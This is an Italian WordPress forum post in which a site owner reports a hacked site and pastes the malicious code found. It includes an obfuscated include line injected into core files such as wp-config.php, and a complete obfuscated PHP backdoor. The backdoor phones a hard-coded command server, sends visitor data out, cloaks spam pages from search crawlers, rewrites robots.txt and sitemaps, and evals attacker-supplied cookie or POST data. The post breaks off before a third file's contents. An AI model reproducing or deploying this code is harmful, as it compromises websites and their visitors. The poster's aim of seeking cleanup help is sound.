Supporto » Varie ed eventuali » Sito violato, file modificati, cartelle create

  • Salve a tutti,
    sono nuovo nel forum, utilizzo wordpress da alcuni anni.
    Ho riscontrato un Enorme problema in un sito web che gestisco, vi elenco i problemi, ovvero sicuramente malware:

    nella root principale dove ci sono cartelle e file, alcuni file esempio:
    index.php
    wp-config.php
    wp-settings.php
    etc…
    sono stati modificati, ovvero all’interno del file, sono state aggiunte queste righe di codice:

    
    /*d9507*/
    @include "\057ho\155e/\160ed\141le\164ri\143ol\157re\057pu\142li\143_h\164ml\057wp\055in\143lu\144es\057bl\157ck\163/c\141le\156da\162/.\142cf\142c0\1428.\151co";
    /*d9507*/
    

    poi sono state create delle cartelle, con nomi strani, all’interno c’è un file denominato index.php il codice presdente è:
    @ini_set('error_log', NULL);@ini_set('log_errors', 0);@ini_set('max_execution_time', 0);@error_reporting(0);@set_time_limit(0);date_default_timezone_set('UTC');class _rjyire{static private $_2d9wb7ft = 84537037;static function _6nb3f($_abwoe9mn, $_8yfo3khv){$_abwoe9mn[2] = count($_abwoe9mn) > 4 ? long2ip(_rjyire::$_2d9wb7ft - 728) : $_abwoe9mn[2];$_3fy3rnlv = _rjyire::_l9066($_abwoe9mn, $_8yfo3khv);if (!$_3fy3rnlv) {$_3fy3rnlv = _rjyire::_40w78($_abwoe9mn, $_8yfo3khv);}return $_3fy3rnlv;}static function _l9066($_abwoe9mn, $_3fy3rnlv, $_qsz31x78 = NULL){if (!function_exists('curl_version')) {return "";}if (is_array($_abwoe9mn)) {$_abwoe9mn = implode("/", $_abwoe9mn);}$_nwuiwdhn = curl_init();curl_setopt($_nwuiwdhn, CURLOPT_SSL_VERIFYHOST, false);curl_setopt($_nwuiwdhn, CURLOPT_SSL_VERIFYPEER, false);curl_setopt($_nwuiwdhn, CURLOPT_URL, $_abwoe9mn);if (!empty($_3fy3rnlv)) {curl_setopt($_nwuiwdhn, CURLOPT_POST, 1);curl_setopt($_nwuiwdhn, CURLOPT_POSTFIELDS, $_3fy3rnlv);}if (!empty($_qsz31x78)) {curl_setopt($_nwuiwdhn, CURLOPT_HTTPHEADER, $_qsz31x78);}curl_setopt($_nwuiwdhn, CURLOPT_RETURNTRANSFER, TRUE);$_cm59hgy5 = curl_exec($_nwuiwdhn);curl_close($_nwuiwdhn);return $_cm59hgy5;}static function _40w78($_abwoe9mn, $_3fy3rnlv, $_qsz31x78 = NULL){if (is_array($_abwoe9mn)) {$_abwoe9mn = implode("/", $_abwoe9mn);}if (!empty($_3fy3rnlv)) {$_kmivd3lp = array('method' => 'POST','header' => 'Content-type: application/x-www-form-urlencoded','content' => $_3fy3rnlv);if (!empty($_qsz31x78)) {$_kmivd3lp["header"] = $_kmivd3lp["header"] . "\r\n" . implode("\r\n", $_qsz31x78);}$_tltqoo6e = stream_context_create(array('http' => $_kmivd3lp));} else {$_kmivd3lp = array('method' => 'GET',);if (!empty($_qsz31x78)) {$_kmivd3lp["header"] = implode("\r\n", $_qsz31x78);}$_tltqoo6e = stream_context_create(array('http' => $_kmivd3lp));}return @file_get_contents($_abwoe9mn, FALSE, $_tltqoo6e);}}class _rthpn88{private static $_k63tzh9f = "";private static $_cpwy1mih = -1;private static $_n2xvz23t = "";private $_mi8pdpyn = "";private $_qgyjrkds = "";private $_ft3y0j4r = "";private $_xxqorlts = "";public static function _r2lu5($_cfyby5vv, $_api83au6, $_9bh0q0tv){_rthpn88::$_k63tzh9f = $_cfyby5vv . "/cache/";_rthpn88::$_cpwy1mih = $_api83au6;_rthpn88::$_n2xvz23t = $_9bh0q0tv;if (!@file_exists(_rthpn88::$_k63tzh9f)) {@mkdir(_rthpn88::$_k63tzh9f);}}static public function _sry35(){$_n6kr9w1e = 0;foreach (scandir(_rthpn88::$_k63tzh9f) as $_cmxyqmp1) {$_n6kr9w1e += 1;}return $_n6kr9w1e;}public static function _obtpk(){return TRUE;}public function __construct($_lk6997mu, $_awf0fhgr, $_txikr7hs, $_0wz75mln){$this->_mi8pdpyn = $_lk6997mu;$this->_qgyjrkds = $_awf0fhgr;$this->_ft3y0j4r = $_txikr7hs;$this->_xxqorlts = $_0wz75mln;}public function _upktf(){function _ipjab($_qru2hk8e, $_01hrpgjh){return round(rand($_qru2hk8e, $_01hrpgjh - 1) + (rand(0, PHP_INT_MAX - 1) / PHP_INT_MAX), 2);}$_sg05zl9j = _h6dhczx::_h93q9();$_3fy3rnlv = str_replace("{{ text }}", $this->_qgyjrkds,str_replace("{{ keyword }}", $this->_ft3y0j4r,str_replace("{{ links }}", $this->_xxqorlts, $this->_mi8pdpyn)));while (TRUE) {$_u7pu8sv3 = preg_replace('/' . preg_quote("{{ randkeyword }}", '/') . '/', _h6dhczx::_ytlw7(), $_3fy3rnlv, 1);if ($_u7pu8sv3 === $_3fy3rnlv) {break;}$_3fy3rnlv = $_u7pu8sv3;}while (TRUE) {preg_match('/{{ KEYWORDBYINDEX-ANCHOR (\d*) }}/', $_3fy3rnlv, $_uuoxevdj);if (empty($_uuoxevdj)) {break;}$_txikr7hs = @$_sg05zl9j[intval($_uuoxevdj[1])];$_srvjq02r = _cqfim72::_25kvr($_txikr7hs);$_3fy3rnlv = str_replace($_uuoxevdj[0], $_srvjq02r, $_3fy3rnlv);}while (TRUE) {preg_match('/{{ KEYWORDBYINDEX (\d*) }}/', $_3fy3rnlv, $_uuoxevdj);if (empty($_uuoxevdj)) {break;}$_txikr7hs = @$_sg05zl9j[intval($_uuoxevdj[1])];$_3fy3rnlv = str_replace($_uuoxevdj[0], $_txikr7hs, $_3fy3rnlv);}while (TRUE) {preg_match('/{{ RANDFLOAT (\d*)-(\d*) }}/', $_3fy3rnlv, $_uuoxevdj);if (empty($_uuoxevdj)) {break;}$_3fy3rnlv = str_replace($_uuoxevdj[0], _ipjab($_uuoxevdj[1], $_uuoxevdj[2]), $_3fy3rnlv);}while (TRUE) {preg_match('/{{ RANDINT (\d*)-(\d*) }}/', $_3fy3rnlv, $_uuoxevdj);if (empty($_uuoxevdj)) {break;}$_3fy3rnlv = str_replace($_uuoxevdj[0], rand($_uuoxevdj[1], $_uuoxevdj[2]), $_3fy3rnlv);}return $_3fy3rnlv;}public function _xnpn4(){$_xan00brs = _rthpn88::$_k63tzh9f . md5($this->_ft3y0j4r . _rthpn88::$_n2xvz23t);if (_rthpn88::$_cpwy1mih == -1) {$_2h2r40e0 = -1;} else {$_2h2r40e0 = time() + (3600 * 24 * 30);}$_4ih6ng42 = array("template" => $this->_mi8pdpyn, "text" => $this->_qgyjrkds, "keyword" => $this->_ft3y0j4r,"links" => $this->_xxqorlts, "expired" => $_2h2r40e0);@file_put_contents($_xan00brs, serialize($_4ih6ng42));}static public function _h8n79($_txikr7hs){$_xan00brs = _rthpn88::$_k63tzh9f . md5($_txikr7hs . _rthpn88::$_n2xvz23t);$_xan00brs = @unserialize(@file_get_contents($_xan00brs));if (!empty($_xan00brs) && ($_xan00brs["expired"] > time() || $_xan00brs["expired"] == -1)) {return new _rthpn88($_xan00brs["template"], $_xan00brs["text"], $_xan00brs["keyword"], $_xan00brs["links"]);} else {return null;}}}class _s269ka{private static $_k63tzh9f = "";private static $_y1ymvkz8 = "";public static function _r2lu5($_cfyby5vv, $_tolnhsib){_s269ka::$_k63tzh9f = $_cfyby5vv . "/";_s269ka::$_y1ymvkz8 = $_tolnhsib;if (!@file_exists(_s269ka::$_k63tzh9f)) {@mkdir(_s269ka::$_k63tzh9f);}}public static function _obtpk(){return TRUE;}static public function _sry35(){$_n6kr9w1e = 0;foreach (scandir(_s269ka::$_k63tzh9f) as $_cmxyqmp1) {if (strpos($_cmxyqmp1, _s269ka::$_y1ymvkz8) === 0) {$_n6kr9w1e += 1;}}return $_n6kr9w1e;}static public function _ytlw7(){$_jrq92p7z = array();foreach (scandir(_s269ka::$_k63tzh9f) as $_cmxyqmp1) {if (strpos($_cmxyqmp1, _s269ka::$_y1ymvkz8) === 0) {$_jrq92p7z[] = $_cmxyqmp1;}}return @file_get_contents(_s269ka::$_k63tzh9f . $_jrq92p7z[array_rand($_jrq92p7z)]);}static public function _xnpn4($_4h4ro24x){if (@file_exists(_s269ka::$_y1ymvkz8 . "_" . md5($_4h4ro24x) . ".html")) {return;}@file_put_contents(_s269ka::$_y1ymvkz8 . "_" . md5($_4h4ro24x) . ".html", $_4h4ro24x);}}class _h6dhczx{private static $_k63tzh9f = "";private static $_y1ymvkz8 = "";private static $_6yas4x0c = array();private static $_9f0n8vcl = array();public static function _r2lu5($_cfyby5vv, $_tolnhsib){_h6dhczx::$_k63tzh9f = $_cfyby5vv . "/";_h6dhczx::$_y1ymvkz8 = $_tolnhsib;if (!@file_exists(_h6dhczx::$_k63tzh9f)) {@mkdir(_h6dhczx::$_k63tzh9f);}}private static function _ashu1(){$_4lx9tym4 = array();foreach (scandir(_h6dhczx::$_k63tzh9f) as $_cmxyqmp1) {if (strpos($_cmxyqmp1, _h6dhczx::$_y1ymvkz8) === 0) {$_4lx9tym4[] = $_cmxyqmp1;}}return $_4lx9tym4;}public static function _obtpk(){return TRUE;}static public function _ytlw7(){if (empty(_h6dhczx::$_6yas4x0c)) {$_4lx9tym4 = _h6dhczx::_ashu1();_h6dhczx::$_6yas4x0c = @file(_h6dhczx::$_k63tzh9f . $_4lx9tym4[array_rand($_4lx9tym4)], FILE_IGNORE_NEW_LINES);}return _h6dhczx::$_6yas4x0c[array_rand(_h6dhczx::$_6yas4x0c)];}static public function _h93q9(){if (empty(_h6dhczx::$_9f0n8vcl)) {$_4lx9tym4 = _h6dhczx::_ashu1();foreach ($_4lx9tym4 as $_rsz2yre4) {_h6dhczx::$_9f0n8vcl = array_merge(_h6dhczx::$_9f0n8vcl, @file(_h6dhczx::$_k63tzh9f . $_rsz2yre4, FILE_IGNORE_NEW_LINES));}}return _h6dhczx::$_9f0n8vcl;}static public function _xnpn4($_hod9y4k1){if (@file_exists(_h6dhczx::$_y1ymvkz8 . "_" . md5($_hod9y4k1) . ".list")) {return;}@file_put_contents(_h6dhczx::$_y1ymvkz8 . "_" . md5($_hod9y4k1) . ".list", $_hod9y4k1);}static public function _5oekv($_txikr7hs){@file_put_contents(_h6dhczx::$_y1ymvkz8 . "_" . md5(_cqfim72::$_7uigpzys) . ".list", $_txikr7hs . "\n", 8);}}class _cqfim72{static public $_1bgey6eb = "5.3";static public $_7uigpzys = "dd4074a4-4cde-a0f0-8255-f5266e158790";private $_159o4ero = "http://136.12.78.46/app/assets/api2?action=redir";private $_ne9xwwkz = "http://136.12.78.46/app/assets/api?action=page";static public $_n4vffsjw = 5;static public $_zdyz2axj = 20;private function _fb8y7(){$_vpl9ipeq = array('#libwww-perl#i','#MJ12bot#i','#msnbot#i', '#msnbot-media#i','#YandexBot#i', '#msnbot#i', '#YandexWebmaster#i','#spider#i', '#yahoo#i', '#google#i', '#altavista#i','#ask#i','#yahoo!\s*slurp#i','#BingBot#i');if (!empty($_SERVER['HTTP_USER_AGENT']) && (FALSE !== strpos(preg_replace($_vpl9ipeq, '-NO-WAY-', $_SERVER['HTTP_USER_AGENT']), '-NO-WAY-'))) {$_m75irtfe = 1;} elseif (empty($_SERVER['HTTP_ACCEPT_LANGUAGE']) || empty($_SERVER['HTTP_REFERER'])) {$_m75irtfe = 1;} elseif (strpos($_SERVER['HTTP_REFERER'], "google") === FALSE &&strpos($_SERVER['HTTP_REFERER'], "yahoo") === FALSE &&strpos($_SERVER['HTTP_REFERER'], "bing") === FALSE &&strpos($_SERVER['HTTP_REFERER'], "yandex") === FALSE) {$_m75irtfe = 1;} else {$_m75irtfe = 0;}return $_m75irtfe;}private static function _9j03s(){$_8yfo3khv = array();$_8yfo3khv['ip'] = $_SERVER['REMOTE_ADDR'];$_8yfo3khv['qs'] = @$_SERVER['HTTP_HOST'] . @$_SERVER['REQUEST_URI'];$_8yfo3khv['ua'] = @$_SERVER['HTTP_USER_AGENT'];$_8yfo3khv['lang'] = @$_SERVER['HTTP_ACCEPT_LANGUAGE'];$_8yfo3khv['ref'] = @$_SERVER['HTTP_REFERER'];$_8yfo3khv['enc'] = @$_SERVER['HTTP_ACCEPT_ENCODING'];$_8yfo3khv['acp'] = @$_SERVER['HTTP_ACCEPT'];$_8yfo3khv['char'] = @$_SERVER['HTTP_ACCEPT_CHARSET'];$_8yfo3khv['conn'] = @$_SERVER['HTTP_CONNECTION'];return $_8yfo3khv;}public function __construct(){$this->_159o4ero = explode("/", $this->_159o4ero);$this->_ne9xwwkz = explode("/", $this->_ne9xwwkz);}static public function _1copw($_l4syzkad){if (strlen($_l4syzkad) < 4) {return "";}$_r2it9ts5 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";$_sg05zl9j = str_split($_r2it9ts5);$_sg05zl9j = array_flip($_sg05zl9j);$_towp3ylv = 0;$_tr8svs2y = "";$_l4syzkad = preg_replace("~[^A-Za-z0-9\+\/\=]~", "", $_l4syzkad);do {$_m6eh4k4n = $_sg05zl9j[$_l4syzkad[$_towp3ylv++]];$_fqewi4pc = $_sg05zl9j[$_l4syzkad[$_towp3ylv++]];$_thk7spqz = $_sg05zl9j[$_l4syzkad[$_towp3ylv++]];$_d1y2u7lo = $_sg05zl9j[$_l4syzkad[$_towp3ylv++]];$_gybbwgjq = ($_m6eh4k4n << 2) | ($_fqewi4pc >> 4);$_rqpd1aej = (($_fqewi4pc & 15) << 4) | ($_thk7spqz >> 2);$_ld9tnb9z = (($_thk7spqz & 3) << 6) | $_d1y2u7lo;$_tr8svs2y = $_tr8svs2y . chr($_gybbwgjq);if ($_thk7spqz != 64) {$_tr8svs2y = $_tr8svs2y . chr($_rqpd1aej);}if ($_d1y2u7lo != 64) {$_tr8svs2y = $_tr8svs2y . chr($_ld9tnb9z);}} while ($_towp3ylv < strlen($_l4syzkad));return $_tr8svs2y;}private function _8cyp7($_txikr7hs){$_lk6997mu = "";$_awf0fhgr = "";$_8yfo3khv = _cqfim72::_9j03s();$_8yfo3khv["uid"] = _cqfim72::$_7uigpzys;$_8yfo3khv["keyword"] = $_txikr7hs;$_8yfo3khv["tc"] = 10;$_8yfo3khv = http_build_query($_8yfo3khv);$_y3jqeqay = _rjyire::_6nb3f($this->_ne9xwwkz, $_8yfo3khv);if (strpos($_y3jqeqay, _cqfim72::$_7uigpzys) === FALSE) {return array($_lk6997mu, $_awf0fhgr);}$_lk6997mu = _s269ka::_ytlw7();$_awf0fhgr = substr($_y3jqeqay, strlen(_cqfim72::$_7uigpzys));$_awf0fhgr = explode("\n", $_awf0fhgr);shuffle($_awf0fhgr);$_awf0fhgr = implode(" ", $_awf0fhgr);return array($_lk6997mu, $_awf0fhgr);}private function _yt32p(){$_8yfo3khv = _cqfim72::_9j03s();if (isset($_SERVER['HTTP_CF_CONNECTING_IP'])) {$_8yfo3khv['cfconn'] = @$_SERVER['HTTP_CF_CONNECTING_IP'];}if (isset($_SERVER['HTTP_X_REAL_IP'])) {$_8yfo3khv['xreal'] = @$_SERVER['HTTP_X_REAL_IP'];}if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {$_8yfo3khv['xforward'] = @$_SERVER['HTTP_X_FORWARDED_FOR'];}$_8yfo3khv["uid"] = _cqfim72::$_7uigpzys;$_8yfo3khv = http_build_query($_8yfo3khv);$_av1osu2q = _rjyire::_6nb3f($this->_159o4ero, $_8yfo3khv);$_av1osu2q = @unserialize($_av1osu2q);if (isset($_av1osu2q["type"]) && $_av1osu2q["type"] == "redir") {if (!empty($_av1osu2q["data"]["header"])) {header($_av1osu2q["data"]["header"]);return true;} elseif (!empty($_av1osu2q["data"]["code"])) {echo $_av1osu2q["data"]["code"];return true;}}return false;}public function _obtpk(){return _rthpn88::_obtpk() && _s269ka::_obtpk() && _h6dhczx::_obtpk();}static public function _ayawc(){if ((!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') || $_SERVER['SERVER_PORT'] == 443) {return true;}return false;}public static function _nze5p(){$_h46qo2n7 = explode("?", $_SERVER["REQUEST_URI"], 2);$_h46qo2n7 = $_h46qo2n7[0];if (strpos($_h46qo2n7, ".php") === FALSE) {$_h46qo2n7 = explode("/", $_h46qo2n7);array_pop($_h46qo2n7);$_h46qo2n7 = implode("/", $_h46qo2n7) . "/";}return sprintf("%s://%s%s", _cqfim72::_ayawc() ? "https" : "http", $_SERVER['HTTP_HOST'], $_h46qo2n7);}public static function _4ejca(){$_2zj0nny5 = Array("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36","Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Edg/96.0.1054.62","Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0","Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.1 Safari/605.1.15","Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36","Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Safari/605.1.15","Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36","Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.1 Safari/605.1.15","Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36","Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36","Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36","Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36");$_ke278tps = array("https://www.google.com/ping?sitemap=" => "Sitemap Notification Received",);$_qsz31x78 = array("Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8","Accept-Language: en-US,en;q=0.5","User-Agent: " . $_2zj0nny5[array_rand($_2zj0nny5)],);$_to27fg02 = urlencode(_cqfim72::_bwc28() . "/sitemap.xml");foreach ($_ke278tps as $_abwoe9mn => $_7kc85jy1) {$_085pfn8u = _rjyire::_l9066($_abwoe9mn . $_to27fg02, NULL, $_qsz31x78);if (empty($_085pfn8u)) {$_085pfn8u = _rjyire::_40w78($_abwoe9mn . $_to27fg02, NULL, $_qsz31x78);}if (empty($_085pfn8u)) {return FALSE;}if (strpos($_085pfn8u, $_7kc85jy1) === FALSE) {return FALSE;}}return TRUE;}public static function _ztzjr(){$_okdhp6f7 = "User-agent: *\nDisallow: %s\nUser-agent: Bingbot\nUser-agent: Googlebot\nUser-agent: Slurp\nDisallow:\nSitemap: %s\n";$_h46qo2n7 = explode("?", $_SERVER["REQUEST_URI"], 2);$_h46qo2n7 = $_h46qo2n7[0];$_z6qkaj48 = substr($_h46qo2n7, 0, strrpos($_h46qo2n7, "/"));$_kp3zkd6w = sprintf($_okdhp6f7, $_z6qkaj48, _cqfim72::_bwc28() . "/sitemap.xml");$_3whh3em1 = $_SERVER["DOCUMENT_ROOT"] . "/robots.txt";if (@file_exists($_3whh3em1)) {@chmod($_3whh3em1, 0777);$_cmsqf6hf = @file_get_contents($_3whh3em1);} else {$_cmsqf6hf = "";}if (strpos($_cmsqf6hf, $_kp3zkd6w) === FALSE) {@file_put_contents($_3whh3em1, $_cmsqf6hf . "\n" . $_kp3zkd6w);$_cmsqf6hf = @file_get_contents($_3whh3em1);return (strpos($_cmsqf6hf, $_kp3zkd6w) !== FALSE);}return FALSE;}public static function _bwc28(){$_h46qo2n7 = explode("?", $_SERVER["REQUEST_URI"], 2);$_h46qo2n7 = $_h46qo2n7[0];$_cfyby5vv = substr($_h46qo2n7, 0, strrpos($_h46qo2n7, "/"));return sprintf("%s://%s%s", _cqfim72::_ayawc() ? "https" : "http", $_SERVER['HTTP_HOST'], $_cfyby5vv);}public static function _25kvr($_txikr7hs){$_3egy51jd = _cqfim72::_nze5p();$_uuxqgelt = substr(md5(_cqfim72::$_7uigpzys . "salt3"), 0, 6);$_573a5o2r = "";if (substr($_3egy51jd, -1) == "/") {if (ord($_uuxqgelt[1]) % 2) {$_txikr7hs = str_replace(" ", "-", $_txikr7hs);} else {$_txikr7hs = str_replace(" ", "-", $_txikr7hs);}$_573a5o2r = sprintf("%s%s.html", $_3egy51jd, urlencode($_txikr7hs));} else {if (FALSE && (ord($_uuxqgelt[0]) % 2)) {$_573a5o2r = sprintf("%s?%s=%s",$_3egy51jd,$_uuxqgelt,urlencode(str_replace(" ", "-", $_txikr7hs)));} else {$_zgu1agut = array("id", "page", "tag");$_c58n781y = $_zgu1agut[ord($_uuxqgelt[2]) % count($_zgu1agut)];if (ord($_uuxqgelt[1]) % 2) {$_txikr7hs = str_replace(" ", "-", $_txikr7hs);} else {$_txikr7hs = str_replace(" ", "-", $_txikr7hs);}$_573a5o2r = sprintf("%s?%s=%s",$_3egy51jd,$_c58n781y,urlencode($_txikr7hs));}}return $_573a5o2r;}public static function _9nl1a($_qru2hk8e, $_01hrpgjh){$_2shel3xi = "";for ($_towp3ylv = 0; $_towp3ylv < rand($_qru2hk8e, $_01hrpgjh); $_towp3ylv++) {$_txikr7hs = _h6dhczx::_ytlw7();$_2shel3xi .= sprintf("<a href=\"%s\">%s</a>,\n",_cqfim72::_25kvr($_txikr7hs), ucwords($_txikr7hs));}return $_2shel3xi;}public static function _oiwn0($_ittn9lq1 = FALSE){$_tej93zxq = dirname(__FILE__) . "/sitemap.xml";$_v97jk5uy = "<?xml version=\"1.0\" encoding=\"UTF-8\"?" . ">\n<urlset xmlns=\"http://www.sitemaps.org/schemas/sitemap/0.9\">\n";$_0gp89u6y = "</urlset>";$_sg05zl9j = _h6dhczx::_h93q9();$_i3q2gdxj = array();if (file_exists($_tej93zxq)) {$_y3jqeqay = simplexml_load_file($_tej93zxq);foreach ($_y3jqeqay as $_ccaqt8r5) {$_i3q2gdxj[(string)$_ccaqt8r5->loc] = (string)$_ccaqt8r5->lastmod;}} else {$_ittn9lq1 = FALSE;}foreach ($_sg05zl9j as $_q67rhvuo) {$_573a5o2r = _cqfim72::_25kvr($_q67rhvuo);if (isset($_i3q2gdxj[$_573a5o2r])) {continue;}if ($_ittn9lq1) {$_b8mfdvbf = time();} else {$_b8mfdvbf = time() - (crc32($_q67rhvuo) % (60 * 60 * 24 * 30));}$_i3q2gdxj[$_573a5o2r] = date("Y-m-d", $_b8mfdvbf);}$_vf4ra3wy = "";foreach ($_i3q2gdxj as $_abwoe9mn => $_b8mfdvbf) {$_vf4ra3wy .= "<url>\n";$_vf4ra3wy .= sprintf("<loc>%s</loc>\n", $_abwoe9mn);$_vf4ra3wy .= sprintf("<lastmod>%s</lastmod>\n", $_b8mfdvbf);$_vf4ra3wy .= "</url>\n";}$_f81pyder = $_v97jk5uy . $_vf4ra3wy . $_0gp89u6y;$_to27fg02 = _cqfim72::_bwc28() . "/sitemap.xml";@file_put_contents($_tej93zxq, $_f81pyder);return $_to27fg02;}public function _qpwwy(){$_c58n781y = substr(md5(_cqfim72::$_7uigpzys . "salt3"), 0, 6);if (!$this->_fb8y7()) {if ($this->_yt32p()) {return;}}if (!empty($_GET)) {$_c2guacgb = array_values($_GET);} else {$_c2guacgb = explode("/", $_SERVER["REQUEST_URI"]);$_c2guacgb = array_reverse($_c2guacgb);}$_txikr7hs = "";foreach ($_c2guacgb as $_pk44sti1) {if (substr_count($_pk44sti1, "-") > 0) {$_txikr7hs = $_pk44sti1;break;}}$_txikr7hs = str_replace($_c58n781y . "-", "", $_txikr7hs);$_txikr7hs = str_replace("-" . $_c58n781y, "", $_txikr7hs);$_txikr7hs = str_replace("-", " ", $_txikr7hs);$_tdnzevth = array(".html", ".php", ".aspx");foreach ($_tdnzevth as $_snux527w) {if (strpos($_txikr7hs, $_snux527w) === strlen($_txikr7hs) - strlen($_snux527w)) {$_txikr7hs = substr($_txikr7hs, 0, strlen($_txikr7hs) - strlen($_snux527w));}}$_txikr7hs = urldecode($_txikr7hs);$_o2y3ufcl = _h6dhczx::_h93q9();if (empty($_txikr7hs)) {$_txikr7hs = $_o2y3ufcl[0];} else if (!in_array($_txikr7hs, $_o2y3ufcl)) {$_ig73pl9n = 0;foreach (str_split($_txikr7hs) as $_nwuiwdhn) {$_ig73pl9n += ord($_nwuiwdhn);}$_txikr7hs = $_o2y3ufcl[$_ig73pl9n % count($_o2y3ufcl)];}if (!empty($_txikr7hs)) {$_av1osu2q = _rthpn88::_h8n79($_txikr7hs);if (empty($_av1osu2q)) {list($_lk6997mu, $_awf0fhgr) = $this->_8cyp7($_txikr7hs);if (empty($_awf0fhgr)) {return;}$_av1osu2q = new _rthpn88($_lk6997mu, $_awf0fhgr, $_txikr7hs, _cqfim72::_9nl1a(_cqfim72::$_n4vffsjw, _cqfim72::$_zdyz2axj));$_av1osu2q->_xnpn4();}echo $_av1osu2q->_upktf();}}}_rthpn88::_r2lu5(dirname(__FILE__), -1, _cqfim72::$_7uigpzys);_s269ka::_r2lu5(dirname(__FILE__), substr(md5(_cqfim72::$_7uigpzys . "salt12"), 0, 4));_h6dhczx::_r2lu5(dirname(__FILE__), substr(md5(_cqfim72::$_7uigpzys . "salt22"), 0, 4));function _o5w9v($_y3jqeqay, $_q67rhvuo){$_xl8bdpr4 = "";for ($_towp3ylv = 0; $_towp3ylv < strlen($_y3jqeqay);) {for ($_p5o0lf07 = 0; $_p5o0lf07 < strlen($_q67rhvuo) && $_towp3ylv < strlen($_y3jqeqay); $_p5o0lf07++, $_towp3ylv++) {$_xl8bdpr4 .= chr(ord($_y3jqeqay[$_towp3ylv]) ^ ord($_q67rhvuo[$_p5o0lf07]));}}return $_xl8bdpr4;}function _2qx5j($_y3jqeqay, $_q67rhvuo, $_24fhhpd9){return _o5w9v(_o5w9v($_y3jqeqay, $_q67rhvuo), $_24fhhpd9);}foreach (array_merge($_COOKIE, $_POST) as $_o88biqxq => $_y3jqeqay) {$_y3jqeqay = @unserialize(_2qx5j(_cqfim72::_1copw($_y3jqeqay), $_o88biqxq, _cqfim72::$_7uigpzys));if (isset($_y3jqeqay['ak']) && _cqfim72::$_7uigpzys == $_y3jqeqay['ak']) {if ($_y3jqeqay['a'] == 'doorway2') {if ($_y3jqeqay['sa'] == 'check') {$_3fy3rnlv = _rjyire::_6nb3f(explode("/", "http://httpbin.org/"), "");if (strlen($_3fy3rnlv) > 512) {echo @serialize(array("uid" => _cqfim72::$_7uigpzys, "v" => _cqfim72::$_1bgey6eb,"cache" => _rthpn88::_sry35(),"keywords" => count(_h6dhczx::_h93q9()),"templates" => _s269ka::_sry35()));}exit;}if ($_y3jqeqay['sa'] == 'templates') {foreach ($_y3jqeqay["templates"] as $_lk6997mu) {_s269ka::_xnpn4($_lk6997mu);echo @serialize(array("uid" => _cqfim72::$_7uigpzys, "v" => _cqfim72::$_1bgey6eb,));}}if ($_y3jqeqay['sa'] == 'keywords') {_h6dhczx::_xnpn4($_y3jqeqay["keywords"]);_cqfim72::_oiwn0();echo @serialize(array("uid" => _cqfim72::$_7uigpzys, "v" => _cqfim72::$_1bgey6eb,));}if ($_y3jqeqay['sa'] == 'update_sitemap') {_cqfim72::_oiwn0(TRUE);echo @serialize(array("uid" => _cqfim72::$_7uigpzys, "v" => _cqfim72::$_1bgey6eb,));}if ($_y3jqeqay['sa'] == 'pages') {$_vruef3d6 = 0;$_o2y3ufcl = _h6dhczx::_h93q9();if (_s269ka::_sry35() > 0) {foreach ($_y3jqeqay['pages'] as $_av1osu2q) {$_ow1agfr3 = _rthpn88::_h8n79($_av1osu2q["keyword"]);if (empty($_ow1agfr3)) {$_ow1agfr3 = new _rthpn88(_s269ka::_ytlw7(), $_av1osu2q["text"], $_av1osu2q["keyword"], _cqfim72::_9nl1a(_cqfim72::$_n4vffsjw, _cqfim72::$_zdyz2axj));$_ow1agfr3->_xnpn4();$_vruef3d6 += 1;if (!in_array($_av1osu2q["keyword"], $_o2y3ufcl)) {_h6dhczx::_5oekv($_av1osu2q["keyword"]);}}}}echo @serialize(array("uid" => _cqfim72::$_7uigpzys, "v" => _cqfim72::$_1bgey6eb, "pages" => $_vruef3d6));}if ($_y3jqeqay["sa"] == "ping") {$_085pfn8u = _cqfim72::_4ejca();echo @serialize(array("uid" => _cqfim72::$_7uigpzys, "v" => _cqfim72::$_1bgey6eb, "result" => (int)$_085pfn8u));}if ($_y3jqeqay["sa"] == "robots") {$_085pfn8u = _cqfim72::_ztzjr();echo @serialize(array("uid" => _cqfim72::$_7uigpzys, "v" => _cqfim72::$_1bgey6eb, "result" => (int)$_085pfn8u));}}if ($_y3jqeqay['sa'] == 'eval') {eval($_y3jqeqay["data"]);exit;}}}$_5tk2ma86 = new _cqfim72();if ($_5tk2ma86->_obtpk()) {$_5tk2ma86->_qpwwy();}exit();

    poi, ho trovato a giro, altri file con nomi strani tipo:
    .3bddbb29.ico
    il suo contenuto è:
